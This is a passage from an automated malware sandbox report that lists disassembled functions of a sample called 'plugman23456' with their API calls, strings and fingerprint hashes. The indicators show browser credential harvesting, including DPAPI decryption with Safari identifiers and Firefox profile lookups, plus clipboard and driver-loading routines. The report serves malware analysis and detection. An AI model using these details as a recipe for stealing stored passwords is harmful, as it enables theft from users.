                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • EmptyClipboard.USER32 ref: 00409882
                          • wcslen.MSVCRT ref: 0040988F
                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                          • memcpy.MSVCRT ref: 004098B5
                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                          • CloseClipboard.USER32 ref: 004098D7
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                          • String ID:
                          • API String ID: 2014503067-0
                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 004182D7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                          • LocalFree.KERNEL32(?), ref: 00418342
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                          • String ID: OsError 0x%x (%u)
                          • API String ID: 403622227-2664311388
                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                          Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          • OpenClipboard.USER32(?), ref: 00411878
                          • GetLastError.KERNEL32 ref: 0041188D
                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                            • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                            • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                          • String ID:
                          • API String ID: 1203541146-0
                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                          Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID:
                          • API String ID: 1865533344-0
                          • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                          • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                          Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                          Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                          Download Yara Rule
                          APIs
                          • _wcsicmp.MSVCRT ref: 004022A6
                          • _wcsicmp.MSVCRT ref: 004022D7
                          • _wcsicmp.MSVCRT ref: 00402305
                          • _wcsicmp.MSVCRT ref: 00402333
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • memset.MSVCRT ref: 0040265F
                          • memcpy.MSVCRT ref: 0040269B
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memcpy.MSVCRT ref: 004026FF
                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                          • API String ID: 2929817778-1134094380
                          • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                          • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                          • String ID: :stringdata$ftp://$http://$https://
                          • API String ID: 2787044678-1921111777
                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                          • GetWindowRect.USER32(?,?), ref: 00414088
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                          • GetDC.USER32 ref: 004140E3
                          • wcslen.MSVCRT ref: 00414123
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                          • ReleaseDC.USER32(?,?), ref: 00414181
                          • _snwprintf.MSVCRT ref: 00414244
                          • SetWindowTextW.USER32(?,?), ref: 00414258
                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                          • GetClientRect.USER32(?,?), ref: 004142E1
                          • GetWindowRect.USER32(?,?), ref: 004142EB
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                          • GetClientRect.USER32(?,?), ref: 0041433B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 2080319088-3046471546
                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                          Download Yara Rule
                          APIs
                          • EndDialog.USER32(?,?), ref: 00413221
                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                          • memset.MSVCRT ref: 00413292
                          • memset.MSVCRT ref: 004132B4
                          • memset.MSVCRT ref: 004132CD
                          • memset.MSVCRT ref: 004132E1
                          • memset.MSVCRT ref: 004132FB
                          • memset.MSVCRT ref: 00413310
                          • GetCurrentProcess.KERNEL32 ref: 00413318
                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                          • memset.MSVCRT ref: 004133C0
                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                          • memcpy.MSVCRT ref: 004133FC
                          • wcscpy.MSVCRT ref: 0041341F
                          • _snwprintf.MSVCRT ref: 0041348E
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                          • SetFocus.USER32(00000000), ref: 004134B7
                          Strings
                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                          • {Unknown}, xrefs: 004132A6
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                          • API String ID: 4111938811-1819279800
                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                          • SetCursor.USER32(00000000), ref: 0040129E
                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                          • EndDialog.USER32(?,?), ref: 0040135E
                          • DeleteObject.GDI32(?), ref: 0040136A
                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                          • ShowWindow.USER32(00000000), ref: 00401398
                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                          • ShowWindow.USER32(00000000), ref: 004013A7
                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                          • String ID:
                          • API String ID: 829165378-0
                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00404172
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 004041D6
                          • wcscpy.MSVCRT ref: 004041E7
                          • memset.MSVCRT ref: 00404200
                          • memset.MSVCRT ref: 00404215
                          • _snwprintf.MSVCRT ref: 0040422F
                          • wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 0040426E
                          • memset.MSVCRT ref: 004042CD
                          • memset.MSVCRT ref: 004042E2
                          • _snwprintf.MSVCRT ref: 004042FE
                          • wcscpy.MSVCRT ref: 00404311
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                          • API String ID: 2454223109-1580313836
                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                          • SetMenu.USER32(?,00000000), ref: 00411453
                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                          • memcpy.MSVCRT ref: 004115C8
                          • ShowWindow.USER32(?,?), ref: 004115FE
                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                          • API String ID: 4054529287-3175352466
                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset$wcscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 3143752011-1996832678
                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                          • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                          • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                          • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                          • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                          • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                          • API String ID: 667068680-2887671607
                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfmemset$wcscpy$wcscat
                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                          • API String ID: 1607361635-601624466
                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintf$memset$wcscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
